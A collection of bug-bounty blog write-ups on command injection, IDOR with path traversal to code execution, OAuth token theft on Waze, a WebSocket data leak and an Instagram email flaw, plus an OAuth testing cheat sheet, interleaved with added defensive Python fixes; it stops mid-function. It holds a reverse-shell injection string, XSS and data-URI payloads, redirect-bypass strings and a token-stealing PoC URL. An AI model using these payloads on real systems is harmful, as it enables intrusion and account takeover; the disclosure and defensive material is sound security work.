Private Program – Backtracking logs for Command Injection.

Hey guys, today I want to share one of my Command Injection findings in a private program. If you haven’t read my earlier post on Code Execution, you will need to read it first, as it will make you familiar with the kind of web app I am hunting here.

What? Go read it first

So let’s start. As I said in the earlier post, I was going through the logs of this web app: 2 GB across 10 files ¯\_(ツ)_/¯. One line caught my attention:


/opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=your+organization&report=abc&from=now-1d&to=now#/greport/iocmatches.rpt?from=now-1d&to=now' iocmatches.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720_2017_07_02_10_58_00_002040.pdf

So the web app was executing PhantomJS on a URL. What caught my eye was that the org_name parameter had the value your+organisation, which means the command may contain our input. So the first step was to find out from which section of the web app this command was executed and see what inputs we control. Looking at the report under this URL, I found out that it was run by a feature called generate report, which generates a PDF report. Now let’s have a look at the parameters:

{"parameter":"report_iocmatches_weekly.rpt","parameter2":"test","parameter3":"* * * * *","parameter4":{"to":"now/d","from":"now/d","mode":"quick"},"enabled":true,"created_ts":"2017-09-17T16:47:48Z","parameter5":"blah.rpt","modified_ts":"2017-09-17T16:47:48Z","parameter6":"3a71d03e9d584bd092968bc96dcb5f720","parameter7":"test","$$hashKey":"032"}

No org_name 🙁 But wait, the “parameter6” value is reflected there, so let’s try this. I passed:

"parameter6":"3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |"

And Bhoom!

Now, this was simple, but getting through those 2 GB of logs wasn’t easy, especially when they were split into part files :'( I found this command in the 7th part.
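
The root cause of the finding above is a report id that is concatenated into a command line a shell then parses. The following is an added example (not the program’s own code) that shows, in Python, how a shell tokenises such a line when the id carries extra words, and the two fixes a defender would apply: validate the id against a strict allow-list and pass the command as an argv list with no shell involved. The paths are the ones quoted in the log line; the allow-list pattern and the report-template set are assumptions.

```python
import re
import shlex
import subprocess
from urllib.parse import urlencode

# Added example, not the program's code. The report id (parameter6 on the page)
# is the value that ended up inside a shell command line; the allow-list below
# is an assumption about what a valid id looks like (hex string, 32-40 chars).
SAFE_REPORT_ID = re.compile(r"[0-9a-f]{32,40}")
ALLOWED_REPORTS = {"iocmatches.rpt", "report_iocmatches_weekly.rpt"}  # constructed

PHANTOMJS = "/opt/xx/local/phantomjs/bin/phantomjs"
RENDER_SCRIPT = "/opt/xx/resources/tav_test.js"
REPORT_DIR = "/opt/xx/var/reports"


def build_command_vulnerable(report_id, report_name):
    """The bug pattern: user input concatenated into one string a shell will parse."""
    return (f"{PHANTOMJS} --ignore-ssl-errors=yes {RENDER_SCRIPT} "
            f"'https://localhost:8080/ki/?type=tav&report={report_name}' "
            f"{report_name} {REPORT_DIR}/{report_id}.pdf")


def shell_would_see(cmdline):
    """Tokenise the line the way /bin/sh would, so the injected words are visible."""
    return shlex.split(cmdline)


def is_safe_report_id(report_id):
    """Whole-string match: spaces, pipes and quotes never pass."""
    return SAFE_REPORT_ID.fullmatch(report_id) is not None


def run_report_safe(report_id, report_name, run=subprocess.run):
    """Validate each field, then pass an argv list so no shell is involved."""
    if not is_safe_report_id(report_id):
        raise ValueError("report id must be a hex string")
    if report_name not in ALLOWED_REPORTS:
        raise ValueError("unknown report template")
    url = "https://localhost:8080/ki/?" + urlencode(
        {"type": "tav", "report": report_name, "from": "now-1d", "to": "now"})
    argv = [PHANTOMJS, "--ignore-ssl-errors=yes", RENDER_SCRIPT, url,
            report_name, f"{REPORT_DIR}/{report_id}.pdf"]
    # shell=False is the default; the `run` hook lets callers (and tests) inspect argv
    return run(argv, check=True, timeout=120)


if __name__ == "__main__":
    # Constructed input with a harmless extra command, used only to show the tokenisation.
    tainted = "3a71d03e9d584bd092968bc96dcb5f720 | id"
    print(shell_would_see(build_command_vulnerable(tainted, "iocmatches.rpt")))
    print(run_report_safe("3a71d03e9d584bd092968bc96dcb5f720", "iocmatches.rpt",
                          run=lambda argv, **kw: argv))
```

The argv form is the real fix; the allow-list is defence in depth, and also what lets a log reviewer spot the tainted id at a glance, since a valid id never contains whitespace or shell metacharacters.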

I learned one more thing: always test parameters by fuzzing different things, you don’t know what the developers are doing with your input ¯\_(ツ)_/¯ . Now if you are a good reader you must have noticed this request may be prone to many other issues, and one is quite awesome; I will write about those soon (some of you may have already guessed 😉 ). That’s all for now. I will also soon write about backtracking their OAuth endpoints for account takeover 🙂

Thanks : Prince Chaddha

Thanks for reading!

Harsh from Bugdiscloseguys!

Getting started with Bug Bounty.

Hey, guys! This post is dedicated to all those who want to do bug bounty. Although I am not a ranker like my friends Sandeep, Osama, Parth, Arbaz, etc., I learned many things along my way in bug bounty and I want to share them in this post 🙂

 

What should you know before getting into bug bounty? 

  • First of all, you should know basic things about web apps (ofc. bug bounties are not limited to them): what is HTTP? What is HTML? What are HTML forms? What is JavaScript? What does JS do? The structure of a web app (nowadays all web apps have MVC). IMO these things matter. A book like Web Hacking 101 will help a lot.
  • Keep learning new things. How? HackerOne’s Hacktivity (Web Hacking 101 also covers this section), other hunters’ blogs, and just dig in whenever you see a weird term or thing; maybe you end up learning a good thing?
  • Play with Burp, Explore it 😉

Approaching a target

  • If you’re new, don’t just focus on reward-only sites; go for points. This way you will learn by hunting and gain some rep. points also.
  • Don’t change your target frequently. Give it at least 2-3 days; if you’re new to hunting it won’t be easy for you to find your first bug in minutes or hours.
  • Before hunting for bugs, explore the web app, see what type of app it is, and get some idea of its basics. I always check out the API docs, which give me a quick overview of the web app.
  • If you think that a part of the site should have something, or that something can be bypassed, dig into it. Don’t give up. Just a few days back Osama and I were hunting an endpoint and he ended up bypassing a fix; I gave up but he didn’t ;).
  • Try to bypass their filters/WAF; most of the time there will be a bypass for their filters/WAF. A quick example:

Recently I came across a target with a sitewide WAF which prevented the user from submitting any input containing a JS event handler such as onmouseover, onload, etc. I tried on%0Bload but it was reflected as %0B itself. So I tested their API to create a post, but I was doing it with the API Console, which was behind the WAF, so I manually made a request to api.target.com with my payload as the content of the post and boom, it executed 🙂 This way I managed to get more XSS in it 😀

  • Don’t be lazy. In the above example the manual request bypassed it but the API Console did not, because the API Console was hosted at target.com/api/console, which had the WAF.

That’s all for now, but there will be a second part of this post where I will share some more fun things.

If you liked it do share 🙂

Thanks for reading.
Harsh from Bugdiscloseguys!

 

 

 

Private Program – Code Execution.

As the program is private, the program name and endpoints are replaced **
Hey guys, today I’ll show you how I gained Code Execution on a HackerOne private program. This is a chain of multiple issues, which were addressed separately and all marked as Critical/P1. Nice team 😀
This program had an ABC Enterprise installation and a Normal installation, which has fewer features, or say fewer endpoints 😉 . The program hosted Enterprise for testers with admin credentials given, while Normal was available to download and host locally.
Normal Installation
  • Less features,
  • Less bounty,
  • Gives basic idea how the app is hosted and working on backend. 🙂
Information I gained using the Normal installation
  • Some internal services.
  • Web app structure.
Some XSS and SSRF were found in the Normal installation, but now I had an understanding of what I’m testing.
Let’s go ahead and start with the program-hosted Enterprise, with many more features / endpoints.

1 – Critical IDOR

There was an option to download logs. After downloading the logs I started looking into what they contain, and luckily I found a request in the logs:
GET /api/v1/upload?username=xxx&api_key=xxx&dcid=xxx&timestamp=xxx
where other users’ api_key was being leaked. Hmm, this is good, but we’re working as the admin login right now, so I tried downloading the log while being a normal user and while unauthenticated, and it got downloaded. Using this IDOR an attacker can download logs while unauthenticated to the instance and then further exploit it with the api_key retrieved from the logs. So now I could report this one, but I decided to dig into it further.
After making a request to:
GET /api/v1/upload?username=xxx&api_key=xxx&dcid=ggg&timestamp=123
I got another URL in the response, which was:
Tried changing the filename for LFD but it didn’t work; changed upload to download, still no LFD. Seemed like a dead end :/ But then I thought, let’s make an OPTIONS request (read it in someone’s write-up).
And GET, PUT were there. Made a PUT request and the server responded with ‘Content Length can’t be 0’; added raw data and made the request again and the response was 200 OK. Then I added ../../../../../../../../tmp/harsh.txt in the filename and again the response was 200 OK.
Then ../../../../../../../../etc/harsh.txt, and an exception 😀
Permission Denied (/opt/xxx/api/uploads/../../../../../../../../etc/harsh.txt)
^ Not exactly this.
At this point I had enough things to report:
  • Unauthenticated user can download logs
  • Logs contain API keys
  • Using the API key an attacker can create files on the server (where the current user has permission).
And the plot twist:
  • The API key was the password of the admin user itself.
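
Two of the three findings above come from one defensive gap: request lines with credentials in the query string were written to a log that anyone could download. As an added example (not the vendor’s code), here is a Python redaction filter a defender would put in front of the access log, plus a scanner for already-written dumps. The parameter names come from the request quoted on the page plus a few common ones, which is an assumption; the sample log lines are constructed.

```python
import re

# Added example, not the program's code. Parameter names are taken from the
# request line quoted on the page plus a few common ones (an assumption).
SENSITIVE_PARAMS = ("api_key", "password", "access_token", "token", "session_cookies")

# Matches "?api_key=VALUE" or "&api_key=VALUE" up to the next '&' or whitespace.
_SECRET_RE = re.compile(
    r"([?&](?:" + "|".join(map(re.escape, SENSITIVE_PARAMS)) + r")=)([^&\s]*)",
    re.IGNORECASE,
)


def redact_request_line(line):
    """Replace the value of any sensitive query parameter before the line is logged."""
    return _SECRET_RE.sub(lambda m: m.group(1) + "[REDACTED]", line)


def find_leaked_secrets(lines):
    """Scan an existing log dump; returns (line_number, parameter_name) per hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in _SECRET_RE.finditer(line):
            name = match.group(1)[1:-1]      # strip the leading '?'/'&' and trailing '='
            if match.group(2) and match.group(2) != "[REDACTED]":
                hits.append((number, name.lower()))
    return hits


# Constructed log lines in the shape of the request quoted on the page.
SAMPLE_LOG = [
    "GET /api/v1/upload?username=alice&api_key=k3y-alice-0001&dcid=42&timestamp=1505666868",
    "GET /api/v1/status?dcid=42",
    "POST /api/v1/login?username=bob&password=hunter2",
]

if __name__ == "__main__":
    for hit in find_leaked_secrets(SAMPLE_LOG):
        print("secret in log:", hit)
    for line in SAMPLE_LOG:
        print(redact_request_line(line))
```

Redaction does not replace the access-control fix (the log download itself must require authentication and be scoped to the caller’s own data), but it removes the api_key from the file so that an IDOR on the download endpoint no longer hands out credentials. Running the scanner over the 10 part files the first post mentions would also find the tainted phantomjs line, since any hit with a space or pipe in the value is worth a look.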

All reported, and got a response from the team.

Code Execution with Server Admin Interaction

So after reporting all the above-mentioned issues, I challenged myself to use this endpoint separately and get Code Execution.
And within a few minutes I realized normal user credentials were also accepted at /api/v1/upload, and hence a normal user can create files on the server.
Going back to the logs and the Normal installation to gain info on how this issue could get me Code Execution.
I realized the web app is started from /opt/xxx/bin/xlink, so this was simple: all an attacker needs to do is overwrite xlink with a reverse shell script and wait for the server admin to restart the server (just make some files unusable, which will force the admin to restart) by doing sh xlink restart/stop/start, and as soon as he triggers this condition we will have a reverse shell.
This issue was Normal user to Code Execution. Triaged and rewarded as Critical.
Now these 2 bugs finish here. You might have noticed I mentioned “sh xlink restart/stop/start” as the file is not executable. Will continue later with another RCE 😉 which won’t require the attacker to wait for the admin to restart the server. 😛 Instead all an attacker needs to do is visit a URL and enjoy a shell, although this one will require the attacker to have admin access to the web app.
Thanks for reading.
Harsh from Bugdiscloseguys!

Google VRP : oAuth token stealing.

Hey guys! Hope you are all doing well :). In June/July I decided to hunt on Google products. As Google has almost everything in scope, I went through the list of Google products/fully integrated acquisitions ( https://www.google.com/intl/en/about/products/ ). Waze is one of Google’s fully integrated acquisitions (there’s a difference b/w integrated and non-integrated), so I decided to give it a try 🙂

I was looking at the Waze iOS app and there was an option to log in with Twitter, so I started capturing requests. The URL was like this:

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to checkout again :P)

The flow works in the same manner as the `Authorization Code flow`, as Twitter doesn’t have the `Implicit flow` (as far as I know).

1 – GET Request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 – 302 Response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this

session_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily, yes, it was vulnerable to open redirect; we won the battle already 😀 But wait, we’re working with Twitter’s `oauth_verifier`, which is not very usable from an attacker’s perspective. Also Twitter requires us to authorize the app every time :/

Looking at ‘id’ in http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx, it seems more social connects are possible, so I checked out the Android app as well and found that Facebook and LinkedIn are also there. Started testing on Android; the flow for Facebook was completely different here. I started fuzzing around the old URL and tried replacing Twitter with Facebook.

GET Request – http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response – 500 Error 🙁

But wait, I’ve seen many apps working in this pattern /social/*connection_name*/connect . Let’s give it a try.

GET – http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,

Changed ?redirect=http://harshjaiswal.com and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events

Response –

http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=688

Although this was a fully integrated acquisition, I got a smaller bounty 😛 as they still consider it an acquisition FOR bounty purposes 🙁

But it’s okay! At least I learned one thing: if they don’t give you an endpoint, try to guess it 3:)

I hope you like it. 🙂

Hunting Websockets For Fun And Profit


It’s been a while since we came up with any blog post.
So this post will be about how I grabbed every piece of information that was being updated in my organization, even after I was removed from the organization.
First, let’s start with: what are WebSockets?
A good explanation can be found here https://pusher.com/websockets
Let’s start. As the program is private I cannot share it, so I’ll be naming it victim.com and the subdomain of the organization abc.victim.com.
So while doing my normal testing I noticed that while changing any info on abc.victim.com, a request is made to a WebSocket with the details of the change; for example, in my case:
https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

Response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

After watching the response I thought: what would happen if the user were removed from the organization, would he still be able to fetch data from the organization?
Now the question was: what can and cannot be extracted from the WebSockets?
The first thing I noticed was that the user, after getting kicked from the organization, is still able to extract/grab every detail of the changes happening in the organization by connecting with the WebSocket request which we captured earlier.
Example of the responses after the user was removed from the organization:
RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract the user’s email, project details, customer details and contacts.
The good thing I noticed was that I was able to extract those details even when I had view-only permission.
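
The two failures described above are a server that checks membership only when the socket is opened and then pushes every frame to every open connection, and a push path that ignores the member’s role (a view-only user received billing updates). As an added example (not the vendor’s code), here is a Python model of a push loop that re-checks membership and role per frame. Membership, roles and the admin-only object set are constructed assumptions; the frames mirror the shape of the RECEIVED TEXT lines above, with the page’s ids.

```python
import json

# Added example, not the vendor's code. Org membership, roles and the event
# feed are constructed to mirror the shape of the RECEIVED TEXT lines above.
ORG_MEMBERS = {"202510": "admin", "205693": "viewer"}   # person_id -> role

# Object types that should only reach admins (billing data was pushed to a
# view-only user on the page). Assumption for the example.
ADMIN_ONLY_OBJECTS = {"subscription"}

EVENTS = [
    '{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693}}}',
    '{"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"email":"owner@example.com"}}}',
    '{"action":"update","acting_user_id":202510,"object":{"subscription":{"amount":500,"status":"trial"}}}',
    '{"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada"}}}',
]


class Subscriber:
    def __init__(self, person_id, members):
        # Weak design: authorization decided once, when the socket is opened.
        self.person_id = person_id
        self.authorized_at_connect = person_id in members
        self.received = []


def object_type(raw_event):
    """The single key under "object" names the resource type of the frame."""
    (name,) = json.loads(raw_event)["object"].keys()
    return name


def deliver_connect_time_only(sub, events):
    """Bug pattern: the connect-time decision is trusted for every later frame."""
    if sub.authorized_at_connect:
        sub.received.extend(events)
    return sub.received


def deliver_per_message(sub, events, members):
    """Fix: re-check membership and role for every frame before sending it."""
    for raw in events:
        role = members.get(sub.person_id)
        if role is None:                        # removed from the org: stop, close socket
            break
        if object_type(raw) in ADMIN_ONLY_OBJECTS and role != "admin":
            continue                            # object-level filter for view-only users
        sub.received.append(raw)
    return sub.received


def remove_member(members, person_id):
    """Membership change; a real server would also close that member's sockets."""
    members = dict(members)
    members.pop(person_id, None)
    return members


def scenario():
    """(frames leaked by the weak design, frames sent by the fixed design) after removal."""
    weak = Subscriber("205693", ORG_MEMBERS)        # connects while still a member
    after_removal = remove_member(ORG_MEMBERS, "205693")
    leaked = deliver_connect_time_only(weak, EVENTS)
    fixed = Subscriber("205693", ORG_MEMBERS)
    sent = deliver_per_message(fixed, EVENTS, after_removal)
    return len(leaked), len(sent)
```

In a real deployment the membership lookup would hit a cache invalidated on the “destroy person” event, and the same event would be the trigger to close that person’s sockets outright; the per-frame check is what guarantees nothing leaks in the window before that happens.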
Thanks For Reading.
Cheers
Bugdiscloseguys

Instagram Email Verification Issue

Hey guys! So I won’t be taking too long; it’s a year-old bug I found in Instagram that I thought to share. The bug was very simple, so I’m not going to write much, just a simple PoC :).

Steps to reproduce :

1) Create an account on Instagram with email “abc@x.com”

2) Log in to the account and change the email to “def@x.com”

3) Click on the verification link sent to “def@x.com”; this will change the email of the account to the old email, which is “abc@x.com”

Which seems like a coding misconfiguration; what should happen is that after clicking the confirm link the email should change to “def@x.com”.
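
The correct behaviour is that the address applied on confirmation is the one the token was minted for, never whatever the account record currently holds. As an added example (not Instagram’s code), here is a Python pending-change flow in which the token is an HMAC over the account id, the new address, a nonce and an issue time, confirmation applies the stored pending address, the token is single-use and expires, and a notice is recorded for the old address. The key, TTL and record layout are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Added example, not Instagram's code. The key, the account record layout and
# the TTL are constructed; the point is that the address applied on
# confirmation comes from the pending-change record the token was minted for,
# never from the account's current (old) address.
SERVER_KEY = b"constructed-server-secret"
TOKEN_TTL = 24 * 3600


def _sign(account_id, new_email, nonce, issued):
    msg = f"{account_id}|{new_email}|{nonce}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def request_email_change(account, new_email, now=None):
    """Record the pending address; returns the token to mail to new_email."""
    issued = int(now if now is not None else time.time())
    nonce = secrets.token_hex(8)
    account["pending"] = {"email": new_email, "nonce": nonce, "issued": issued}
    return f"{nonce}.{issued}.{_sign(account['id'], new_email, nonce, issued)}"


def confirm_email_change(account, token, now=None):
    """Apply the pending address only if the token matches it; True on success."""
    pending = account.get("pending")
    if not pending:
        return False                         # nothing pending, or token already used
    try:
        nonce, issued, sig = token.split(".")
        issued = int(issued)
    except ValueError:
        return False
    expected = _sign(account["id"], pending["email"], pending["nonce"], pending["issued"])
    if nonce != pending["nonce"] or issued != pending["issued"]:
        return False
    if not hmac.compare_digest(sig, expected):
        return False
    current = int(now if now is not None else time.time())
    if current - issued > TOKEN_TTL:
        return False
    old = account["email"]
    account["email"] = pending["email"]      # the verified NEW address, not the old one
    account["pending"] = None                # single use
    account.setdefault("notices", []).append(f"email changed from {old} to {account['email']}")
    return True
```

The notice list stands in for the mail that should go to the old address and for the confirmation the page notes was missing on the verify page: the user in the attack scenario would then see what address the account actually ended up with.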

Attack Scenario : 

1) Attacker compromises the user’s email account “abc@x.com”

2) User comes to know about the email account compromise.

3) User changes his/her Instagram email to his/her new email def@x.com

4) User clicks on the link received at “def@x.com”,
but this changes the email back to “abc@x.com” (the user doesn’t know about this because there is no notification on the verify page)

5) User thinks he/she changed the email and is safe now

6) Attacker requests a password reset link for the Instagram account, because he already compromised the old email account, and compromises the Instagram account.

Video PoC https://drive.google.com/file/d/0Bx2_guht6dHMeVN1UEtOSEY0N2M/view

P.S.: Please ignore the video; I used to hunt on my father’s PC those days :p

Timeline :
22 Feb 2016 – Initial Report sent to Facebook.
03 March 2016 – Facebook Confirmed and Fixed the issue.
22 March 2016 – $2000 rewarded.

🙂 Started Facebook Bug Bounty again, hope I find something 🙂

Cheatsheet : Open Authentication – oAuth

Hey guys! I hope you’re all doing well. So today we’re going to discuss oAuth and its bad implementations 🙂

– What is oAuth ?

– OAuth 2 is an authorization framework that enables applications to obtain limited access to user accounts on an HTTP service, such as Facebook, GitHub, and DigitalOcean. It works by delegating user authentication to the service that hosts the user account, and authorizing third-party applications to access the user account. OAuth 2 provides authorization flows for web and desktop applications, and mobile devices.

Visit https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2 (a must read) and learn how OAuth works before you start testing it 🙂


What are the common bugs left in oAuth implementations?

– XSS
– Redirect URL bypass
– CSRF
– ClickJacking 

1 – XSS 

It is possible to get both reflected and stored XSS using oAuth in the developer portal of your target 🙂
Let’s discuss how it is possible. Sometimes the value for “redirect url” is filtered to http(s) links only, and hence you fail to add javascript:alert(10) in the redirect URL, but this can be bypassed if it is not properly validated.

Payload : javascript://https://attacker.com/?z=%0Aalert(1)

Description (as mentioned in the previous post):
javascript:              – JavaScript’s pseudo protocol/scheme
//                       – begins a single-line comment in JS
https://google.com/?aaaa – the comment itself
%0a                      – initiates a new line, which ends the single-line comment
alert(1)                 – a valid JavaScript predefined function

Now this can trick the URL validation into accepting this value as the redirect URL; now you can use

https://app.target.com/v1/oauth/authorize?response_type=code&client_id=xxxxxx-xxxxx
&redirect_uri=javascript://https://attacker.com/?z=%0Aalert(1)&scope=read write&state=kkkk

And bhoom, XSS’ed after the client app grants access. But wait, what’s more malicious you can do here is steal the access token given by the Authorization Server. 🙂

There is another way for XSS: using a data URI.
You can give data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= a try in the redirect URL value 🙂 It may work too.

http://www.paulosyibelo.com/2016/08/instagram-stored-oauth-xss.html (His blog is awesome 😉 )

2 – Redirect URL bypass

Now this one is really vast. What if you can bypass the redirect URL set by the developer? That would be awesome, because you can again steal the access token 😉

If http://example.com is set by the developer, then you can bypass it if the oAuth implementation is not configured well against bypasses.
Some of the good bypasses are the following:

Source : http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html

  • http://example.com%2f%2f.victim.com
  • http://example.com%5c%5c.victim.com
  • http://example.com%3F.victim.com
  • http://example.com%23.victim.com
  • http://victim.com:80%40example.com
  • http://victim.com%2eexample.com

Must read : http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html (Awesome)

Another must read : http://www.nirgoldshlager.com/2013/03/how-i-hacked-any-facebook-accountagain.html (Mind blown)
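
Every bypass in the list above, the javascript: and data: payloads in section 1, and the Waze redirect parameter in the Google VRP post all defeat the same weak check: a substring or prefix test on the registered host, applied to a string the server later decodes. As an added example (not any vendor’s code), here is a Python authorization-server-side validator that splits the job in two: strict rules at registration time (https only, no fragment, no percent-encoding, backslash or wildcard) and an exact string comparison per request with no decoding or normalisation. The registered URI is constructed; the bypass strings are the ones listed above, and the scheme payloads are variants of the section 1 payloads pointed at example.com.

```python
from urllib.parse import urlsplit

# Added example, not any vendor's code. The registered URI is constructed; the
# bypass strings are the ones listed on the page.
REGISTERED_REDIRECTS = {"https://example.com/oauth/callback"}
ALLOWED_SCHEMES = {"https"}


def naive_redirect_check(candidate, registered_host="example.com"):
    """The weak pattern: a substring test on the registered host."""
    return "://" in candidate and registered_host in candidate


def validate_registration(uri):
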